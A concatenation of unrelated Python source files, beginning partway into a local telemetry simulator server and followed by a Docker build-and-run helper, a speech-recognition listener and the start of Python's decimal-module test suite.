self.wfile.write(b'Unrecognized request :(')
return
# Split the query part of the url into the key value pairs
query = dict(x.split('=') for x in urlParams[4].split('&'))
if "start" not in query:
self.end_headers()
self.wfile.write(b'Missing start in query :(')
return
if "end" not in query:
self.end_headers()
self.wfile.write(b'Missing end in query :(')
return
self.end_headers()
data = getData(urlParams[2].split('/')[2], int(query['start']), int(query['end']))
self.wfile.write(data.encode('utf-8'))
def end_headers(self):
self.send_header('Content-Type','application/json; charset=utf-8')
self.send_header("Access-Control-Allow-Origin", "*")
BaseHTTPRequestHandler.end_headers(self)
async def webSockServer(websocket, path):
print("start of webSockServer")
subs = []
toRealTime.clear()
while True:
try:
while True:
receiveMessage = await asyncio.wait_for(websocket.recv(), 0.001)
if receiveMessage != "":
receiveMessage = receiveMessage.split(' ')
if receiveMessage[0] == "subscribe":
subs.append(receiveMessage[1])
elif receiveMessage[0] == "unsubscribe":
subs.remove(receiveMessage[1])
else:
print(f"Unrecognized command received {receiveMessage[0]}")
except asyncio.TimeoutError:
#print("No commands received")
pass
except Exception as e:
print(f"Error in getting commands from client - {e}")
while toRealTime:
newData = toRealTime.popleft()
if newData['id'] in subs:
await websocket.send(json.dumps(newData))
time.sleep(1)
def dataProducer():
print("Starting data producer")
fuelDefault = 99
fuel = fuelDefault
thrustersDefault = "ON"
recdDefault = 1
sentDefault = 1
tempDefault = 100
currentDefault = 10
voltageDefault = 28
while True:
time.sleep(1)
datum = {}
datum['timestamp'] = int(time.time()*1000)
# Fuel can decrease at most by 2% per second
fuel = random.uniform(fuel*.98, fuel)
datum['value'] = fuel
datum['id'] = "prop.fuel"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = thrustersDefault
datum['id'] = "prop.thrusters"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = recdDefault
datum['id'] = "comms.recd"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = sentDefault
datum['id'] = "comms.sent"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
temp = random.uniform(tempDefault*.9, tempDefault*1.1)
datum['value'] = temp
datum['id'] = "pwr.temp"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
current = random.uniform(currentDefault*.9, currentDefault*1.05)
datum['value'] = current
datum['id'] = "pwr.c"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
voltage = random.uniform(voltageDefault*.95, voltageDefault*1.05)
datum['value'] = voltage
datum['id'] = "Generator.Voltage"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
def main():
global toHistorical
global toRealTime
global dataRecord
httpPort = 8090
webSocketPort = 8091
server = HTTPServer(('localhost', httpPort), serverHandler)
threading.Thread(target=server.serve_forever).start()
threading.Thread(target=recordData).start()
threading.Thread(target=dataProducer).start()
websocketServer = websockets.serve(webSockServer, 'localhost', webSocketPort)
print("Created websocket server")
asyncio.get_event_loop().run_until_complete(websocketServer)
asyncio.get_event_loop().run_forever()
#asyncio.get_event_loop().close()
if __name__ == "__main__":
main()
|
docker_boot.py
|
# encoding: utf-8
from dophon.tools import is_windows
from dophon import boot
import logging
import re
import os
import socket
import sys
import threading
import time
from urllib import request
def read_self_prop():
try:
def_prop = __import__('dophon.def_prop.default_properties', fromlist=True)
u_prop = __import__('application', fromlist=True)
# 对比配置文件
for name in dir(def_prop):
if re.match('__.*__', name):
continue
if name in dir(u_prop):
continue
setattr(u_prop, name, getattr(def_prop, name))
sys.modules['properties'] = u_prop
sys.modules['dophon.properties'] = u_prop
except Exception as e:
logging.error(e)
sys.modules['properties'] = def_prop
sys.modules['dophon.properties'] = def_prop
try:
read_self_prop()
except Exception as e:
logging.error('没有找到自定义配置:(application.py)')
logging.error('引用默认配置')
from dophon import properties
from dophon_logger import *
logger = get_logger(DOPHON)
logger.inject_logger(globals())
def IsOpen(ip, port):
"""
检查端口是否被占用
:param ip:
:param port:
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
logger.error('端口被占用:' + port)
s.close()
return True
except:
return False
def listen(code):
"""
监听命令状态码
:param code: os.system()命令返回码
:return: 当不正常执行会抛出错误,谨慎使用!!!
"""
if code >> 8 is 0:
pass
else:
raise Exception('命令执行错误!')
def listen_container_status(container_port, loop_count: int = 3, wait_sec: int = 10):
"""
检测容器端口存活
:return:
"""
# 一分钟后检测
time.sleep(60)
# 默认检测三次
curr_count = 1
while int(curr_count) <= int(loop_count):
# 默认间隔10秒
time.sleep(wait_sec)
if IsOpen(get_docker_address(), int(container_port)):
raise Exception('端口映射异常')
else:
# 报错证明端口正常占用
# 发起请求
url = f'http://{get_docker_address()}:{container_port}/rule/json'
logger.info('容器存活性检查:' + url)
res = request.urlopen(url)
if not res.read():
raise Exception('服务启动异常')
curr_count += 1
logger.info('容器启动成功,请在命令行输入docker ps查看')
def get_docker_address():
"""
获取容器载体ip
:return:
"""
result = os.popen('ipconfig' if is_windows() else 'ifconfig').readlines()
result_lines = []
r_l_copy = []
while result:
line = result[0]
if re.search('^.*(d|D)(o|O)(c|C)(k|K)(e|E)(r|R).*$', line):
result_lines = result.copy()
break
else:
result.pop(0)
for line in result_lines:
line = re.sub('\s*', '', line)
if line and re.search('([0-9]+\.)+[0-9]+$', line) and re.search('(i|I)(p|P)', line):
r_l_copy.append(
re.search('([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', line).group(0)
)
return r_l_copy.pop(0) if r_l_copy else 'can not get container ip'
def attach_container(base_name: str):
"""
进入容器
:return:
"""
os.system('docker attach ' + base_name)
def has_version_expr(info: str):
return re.search('(>=|==|=>|<=|=<)', info)
def run_as_docker(
entity_file_name: str = None,
container_port: str = str(properties.port),
docker_port: str = str(properties.port),
attach_cmd: bool = False,
alive_test: bool = False,
save_image: bool = False,
extra_package: dict = {},
cache_virtual_env_dir: str = '',
package_repository: str = '',
package_cache_path: str = '',
timezone: str = 'Asia/Shanghai',
img_author: str = 'local_user',
img_message: str = 'a new image',
):
"""
利用docker启动项目
:param save_image: 是否保存镜像(选择后不启动,直接导出镜像)
:param alive_test: 容器存活检测(默认不检测)
:param entity_file_name: 入口文件名(包括后缀)
:param container_port: 容器暴露端口
:param docker_port: 容器内部端口 -> 集群模式下的暴露端口,一般为配置文件定义的端口
:param attach_cmd: 是否进入容器内部sh
:param extra_package: 额外需要加载的包以及版本
:param cache_virtual_env_dir: 指定的虚拟器路径,在启动文件同级目录或下级目录
:param package_repository: 自带缓存包路径,若为空会自动执行pip安装
# 阿里云仓库 => https://mirrors.aliyun.com/pypi/simple/
:param package_cache_path: 包缓存路径
:param timezone: 时区代号
:return:
"""
# 依赖包的缓存
package_cache = []
try:
logger.info('容器前期准备')
root = re.sub('\\\\', '/', properties.project_root)
base_name = os.path.basename(root)
import platform
p_version = platform.python_version()
work_dir = './' + base_name
# 生成依赖文件
logger.info('生成依赖文件')
os.system('pip freeze --all >pre_requirements.txt')
with open('./pre_requirements.txt', 'r') as file:
with open('./requirements.txt', 'w') as final_file:
for line in file.readlines():
if line.startswith('-e'):
continue
for key in sys.modules.keys():
if re.search('^dophon(_\w+)*$', key):
pass
else:
if re.search('^_+', key) or re.search('(_|__|\.)+.+$', key):
# print(key,end=']')
continue
module_path = re.sub(
'-',
'_',
re.sub('''(>=|==|=>|<=|=<|<|>|=)['"\w\.]+\s+''', '', line.lower())
)
# print(module_path, '===>', line, '====>', key) if line.startswith('dophon') and key.startswith(
# 'dophon') else None
if re.search(module_path.lower(), key.lower()) or re.search(key.lower(), module_path.lower()):
if module_path in package_cache:
continue
package_cache.append(module_path)
if module_path in extra_package:
final_file.write(f'{module_path}>={extra_package[module_path]}\n')
extra_package.pop(module_path)
else:
final_file.write(line)
continue
# 写入额外包
for package_name, package_version in extra_package.items():
if package_name in extra_package:
final_file.write(
''.join(
[
package_name,
'' if has_version_expr(extra_package[package_name]) else '>=',
extra_package[package_name],
'\n']
)
)
# 会报迭代修改异常
# extra_package.popitem()
else:
final_file.write(
''.join(
[
package_name,
'' if has_version_expr(extra_package[package_name]) else '>=',
package_version,
'\n']
)
)
# 生成Dockerfile
logger.info('生成Dockerfile')
with open('./Dockerfile', 'w') as file:
file.write('FROM python:' + p_version + '\n')
file.write('ADD . ' + work_dir + '\n')
# file.write('ADD . ' + work_dir + '/' + base_name + '\n')
file.write('WORKDIR ' + work_dir + '\n')
if cache_virtual_env_dir:
file.write(f'ADD {cache_virtual_env_dir} ~/.cache_virtual_env' + '\n')
file.write(f'CMD ~/.cache_virtual_env/Scripts/activate' + '\n')
if package_cache_path:
file.write(f'ADD {package_cache_path} ~/.package_cache' + '\n')
file.write(f'CMD python -m import sys;sys.path.append("~/.package_cache");' + '\n')
if package_repository:
# 阿里云仓库 => https://mirrors.aliyun.com/pypi/simple/
file.write(f'RUN pip install -i {package_repository} -r requirements.txt' + '\n')
else:
file.write('RUN pip install --no-cache-dir -r requirements.txt' + '\n')
# 设置系统时区
file.write(f'ENV TZ={timezone}' + '\n')
file.write('RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone' + '\n')
file.write('CMD ["python","./' + (entity_file_name if entity_file_name else 'Bootstrap.py') + '"]' + '\n')
# file.write('CMD ["/bin/bash"]' + '\n')
os.system('cd ' + root)
logger.info('暂停已运行的实例')
os.system('docker stop ' + base_name)
logger.info('移除已运行的实例')
os.system('docker rm ' + base_name)
logger.info('移除旧镜像')
os.system('docker rmi ' + base_name)
logger.info('检测配置合法性')
if IsOpen('127.0.0.1', int(docker_port)):
# 端口被占用
logger.warn('映射端口被占用!!')
logger.info('建立镜像')
listen(os.system('docker build -t ' + base_name + ' .'))
logger.info('运行镜像')
os.system(
'docker run -p ' + container_port
+
':' +
docker_port +
' -d --name ' +
base_name + ' ' +
os.path.basename(
root))
if save_image:
logger.info('检测容器状态')
from subprocess import Popen, PIPE
status_code = '\'{{.State.Status}}\''
__status = 'running'
while __status == 'running':
p = Popen(
f"docker inspect {base_name} -f {status_code}",
stdout=PIPE,
stderr=PIPE
)
p.wait()
__status = eval(p.stdout.read().decode('utf-8'))
from urllib import request
try:
res = request.urlopen(f'http://127.0.0.1:{container_port}/rule/map')
# for name in dir(res):
# print(f'{name}===>{getattr(res, name)}')
if int(res.code) == 200:
break
except:
pass
if __status == 'exited':
raise Exception(f'容器启动失败,状态为{__status}')
logger.info('提交镜像')
from datetime import datetime
__commit_image_name = f'image_{base_name}{datetime.now().timestamp()}'
# 保存镜像
os.system(f"""
docker commit --author "{img_author}" --message "{img_message}" {base_name} {__commit_image_name}
""")
logger.info('生成镜像')
os.system(f"""docker save -o {base_name}.img.bak.__ {__commit_image_name}""")
exit(0)
return
logger.info('打印容器内部地址(空地址代表启动失败)')
os.system('docker inspect --format=\'{{.NetworkSettings.IPAddress}}\' ' + base_name)
logger.info('打印容器载体地址')
print(get_docker_address())
if alive_test:
logger.info('启动检测容器端口')
threading.Thread(target=listen_container_status, args=(container_port,)).start()
if attach_cmd:
logger.info('进入镜像')
# threading.Thread(target=attach_container,args=(base_name,)).start()
attach_container(base_name)
logger.info('容器启动完毕')
except Exception as e:
logger.error(e)
|
speech_to_text.py
|
"""
@title
@description
"""
import argparse
import json
import os
import threading
import time
from datetime import datetime
from time import sleep
import speech_recognition as sr
from auto_drone import DATA_DIR
class Speech2Text:
def __init__(self, input_delay: float = 0.1):
"""
get input from mic
translate signal to words
"""
current_time = time.time()
date_time = datetime.fromtimestamp(time.time())
time_str = date_time.strftime("%Y-%m-%d-%H-%M-%S")
# identification information
self.name = 'google_sr'
self.id = f'{self.name}_{time_str}_{int(current_time)}'
self.event_log = []
self.save_directory = os.path.join(DATA_DIR, 'speech', f'{self.id}')
self.save_fname = os.path.join(self.save_directory, 'message_history.json')
if not os.path.isdir(self.save_directory):
os.makedirs(self.save_directory)
self.input_delay = input_delay
self.mic_history = []
self.listening = False
self.listen_mic_thread = None
self.recognizer = None
return
def cleanup(self):
self.stop_listener()
self.save_history()
return
def get_message_idx(self, message_idx: int):
"""
todo make into iterator using queue
:param message_idx:
:return:
"""
message = self.mic_history[message_idx] if len(self.mic_history) > message_idx else None
return message
def get_last_message(self):
last_translate = self.mic_history[-1] if len(self.mic_history) > 0 else None
return last_translate
def start_listener(self):
"""
:return:
"""
self.listening = True
self.listen_mic_thread = threading.Thread(target=self.__listen_microphone, daemon=True)
self.listen_mic_thread.start()
return
def __listen_microphone(self):
"""
:return:
"""
self.recognizer = sr.Recognizer()
with sr.Microphone() as source:
self.recognizer.adjust_for_ambient_noise(source)
while self.listening:
audio = self.recognizer.listen(source)
try:
audio_text = self.recognizer.recognize_google(audio)
self.mic_history.append(audio_text)
sleep(self.input_delay)
except sr.UnknownValueError as uve:
# self.mic_history.append(f'{uve}')
pass
except sr.RequestError as re:
# self.mic_history.append(f'{re}')
pass
return
def stop_listener(self):
self.listening = False
return
def save_history(self):
"""
:return:
"""
with open(self.save_fname, 'w+') as save_file:
json.dump(fp=save_file, obj=self.mic_history, indent=2)
return
def main(main_args):
input_delay = main_args.get('input_delay', 0.1)
run_len = main_args.get('run_len', 5)
#######################################
speech_text = Speech2Text(input_delay=input_delay)
speech_text.start_listener()
sleep(run_len)
speech_text.stop_listener()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('--input_delay', type=float, default=5,
help='')
parser.add_argument('--run_len', type=float, default=10,
help='')
args = parser.parse_args()
main(vars(args))
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
www2.hursley.ibm.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import glob
import math
import os, sys
import pickle, copy
import unittest
from decimal import *
import numbers
from test.test_support import (TestSkipped, run_unittest, run_doctest,
is_resource_enabled)
import random
try:
import threading
except ImportError:
threading = None
# Useful Test Constant
Signals = getcontext().flags.keys()
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
def init():
global ORIGINAL_CONTEXT
ORIGINAL_CONTEXT = getcontext().copy()
DefaultTestContext = Context(
prec = 9,
rounding = ROUND_HALF_EVEN,
traps = dict.fromkeys(Signals, 0)
)
setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
#Map the test cases' error names to the actual errors
ErrorNames = {'clamped' : Clamped,
'conversion_syntax' : InvalidOperation,
'division_by_zero' : DivisionByZero,
'division_impossible' : InvalidOperation,
'division_undefined' : InvalidOperation,
'inexact' : Inexact,
'invalid_context' : InvalidOperation,
'invalid_operation' : InvalidOperation,
'overflow' : Overflow,
'rounded' : Rounded,
'subnormal' : Subnormal,
'underflow' : Underflow}
def Nonfunction(*args):
"""Doesn't do anything."""
return None
RoundingDict = {'ceiling' : ROUND_CEILING, #Maps test-case names to roundings.
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw
nameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor',
}
# The following functions return True/False rather than a Decimal instance
LOGICAL_FUNCTIONS = (
'is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum',
)
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the
# context and operands. These restrictions are not part of the
# specification; however, the effect of these restrictions does show
# up in some of the testcases. We skip testcases that violate these
# restrictions, since Decimal behaves differently from decNumber for
# these testcases so these testcases would otherwise fail.
decNumberRestricted = ('power', 'ln', 'log10', 'exp')
DEC_MAX_MATH = 999999
def outside_decNumber_bounds(v, context):
if (context.prec > DEC_MAX_MATH or
context.Emax > DEC_MAX_MATH or
-context.Emin > DEC_MAX_MATH):
return True
if not v._is_special and v and (
v.adjusted() > DEC_MAX_MATH or
v.adjusted() < 1-2*DEC_MAX_MATH):
return True
return False
class DecimalTest(unittest.TestCase):
"""Class which tests the Decimal class against the test cases.
Changed for unittest.
"""
def setUp(self):
self.context = Context()
self.ignore_list = ['#']
# Basically, a # means return NaN InvalidOperation.
# Different from a sNaN in trim
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
def eval_file(self, file):
global skip_expected
if skip_expected:
raise TestSkipped
return
for line in open(file).xreadlines():
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except DecimalException, exception:
#Exception raised where there shoudn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
return
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = map(lambda x: x.strip().lower(), s.split(':'))
if funct == 'rounding':
value = RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, Nonfunction)
funct(value)
def eval_equation(self, s):
#global DEFAULT_PRECISION
#print DEFAULT_PRECISION
if not TEST_ALL and random.random() < 0.90:
return
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print "Test ", id,
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
fname = nameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [ErrorNames[x.lower()] for x in exceptions]
for exception in Signals:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = Decimal(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
# skip tests that are related to bounds imposed in the decNumber
# reference implementation
if fname in decNumberRestricted:
if fname == 'power':
if not (vals[1]._isinteger() and
-1999999997 <= vals[1] <= 999999999):
if outside_decNumber_bounds(vals[0], self.context) or \
outside_decNumber_bounds(vals[1], self.context):
#print "Skipping test %s" % s
return
else:
if outside_decNumber_bounds(vals[0], self.context):
#print "Skipping test %s" % s
return
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
if DEBUG:
print "--", self.context
try:
result = str(funct(*vals))
if fname in LOGICAL_FUNCTIONS:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals, error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print "ERROR:", s
raise
myexceptions = self.getexceptions()
self.context.clear_flags()
myexceptions.sort()
theirexceptions.sort()
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
return
def getexceptions(self):
return [e for e in Signals if self.context.flags[e]]
def change_precision(self, prec):
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
self.context.Emin = exp
def change_max_exponent(self, exp):
self.context.Emax = exp
def change_clamp(self, clamp):
self.context._clamp = clamp
# The following classes test the behaviour of Decimal according to PEP 327
class DecimalExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
def test_explicit_from_string(self):
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
#unicode strings should be permitted
self.assertEqual(str(Decimal(u'0E-017')), '0E-17')
self.assertEqual(str(Decimal(u'45')), '45')
self.assertEqual(str(Decimal(u'-Inf')), '-Infinity')
self.assertEqual(str(Decimal(u'NaN123')), 'NaN123')
#but alternate unicode digits should not
self.assertEqual(str(Decimal(u'\uff11')), 'NaN')
def test_explicit_from_tuples(self):
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_Decimal(self):
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
self.assertNotEqual(id(d), id(e))
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
self.assertNotEqual(id(d), id(e))
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
self.assertNotEqual(id(d), id(e))
def test_explicit_context_create_decimal(self):
nc = copy.copy(getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.failUnless(isinstance(d, Decimal))
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
class DecimalImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + None', globals())
def test_implicit_from_int(self):
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', globals())
def test_implicit_from_float(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', globals())
def test_implicit_from_Decimal(self):
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
if 1/2 == 0:
# testing with classic division, so add __div__
oplist.append(('/', '__div__', '__rdiv__'))
else:
# testing with -Qnew, so add __truediv__
oplist.append(('/', '__truediv__', '__rtruediv__'))
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class DecimalFormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
